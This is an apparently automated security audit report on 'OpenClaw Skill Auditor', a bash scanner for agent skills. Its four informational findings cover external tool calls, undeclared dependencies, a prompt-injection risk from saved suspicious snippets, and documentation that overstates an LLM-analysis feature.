OpenClaw Skill Auditor

PassAudited by ClawScan on May 1, 2026.

Overview

The skill matches its stated purpose as a user-run security scanner and shows no hidden exfiltration or destructive behavior, but users should treat its shell execution and manual LLM-review workflow carefully.

This appears suitable as a lightweight pre-install scanner, but run it only against intended skill paths, verify the local tooling it depends on, treat any saved suspicious-code file as untrusted prompt content, and do not rely on a clean result as proof that a skill is safe.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

What this means

Running the scanner can fetch a named skill and read files in the scanned skill directory.

Why it was flagged

The scanner invokes external tooling to fetch and inspect skills. This is central to the stated audit purpose, but users should understand that running the script delegates work to the local clawhub command.

Skill content
if ! clawhub inspect "$SKILL_NAME" --dir "$TEMP_DIR" > /dev/null 2>&1; then
Recommendation

Run it only for skills or local paths you intend to audit, and review the command/output rather than treating it as a silent background operation.

What this means

The skill may fail or behave differently if expected local tools such as clawhub, grep, find, or base64 are unavailable or replaced.

Why it was flagged

The registry metadata does not declare runtime binary requirements, while the included script is meant to be run with bash and uses external commands. This is an under-declared dependency issue, not evidence of malicious behavior.

Skill content
Required binaries (all must exist): none ... No install spec — this is an instruction-only skill.
Recommendation

Before relying on results, confirm the expected local commands are installed and come from trusted sources.

What this means

A malicious skill being audited could place prompt-injection text in the saved suspicious-code file, and that text could influence an agent if analyzed without care.

Why it was flagged

Suspicious snippets from an untrusted skill are saved to a persistent temporary file and the user is prompted to have an agent analyze it. That is purpose-aligned, but the contents should be treated as untrusted prompt/code input.

Skill content
local output_file="/tmp/skill-audit-${skill_name}-suspicious.txt"
cp "$SUSPICIOUS_CODE" "$output_file"
echo -e "   ${MAGENTA}分析这段可疑代码: cat $output_file${NC}"
Recommendation

Treat the saved file as untrusted evidence, do not follow instructions contained in it, and delete the /tmp review file when no longer needed.

What this means

A user may place too much trust in an 'APPEARS SAFE' result from a limited pattern-based scanner.

Why it was flagged

The documentation describes a Gemini CLI LLM-analysis layer, but the provided script only saves suspicious snippets and asks the user to request agent analysis. This could lead users to overestimate the automation or completeness of the verdict.

Skill content
Uses Gemini CLI to analyze suspicious code intent:
- Semantic understanding beyond pattern matching
- Detects novel/unknown threats
- Requires `gemini` CLI installed
Recommendation

Use this as an advisory pre-screen only; manually review high-risk skills and do not assume a clean result proves a skill is safe.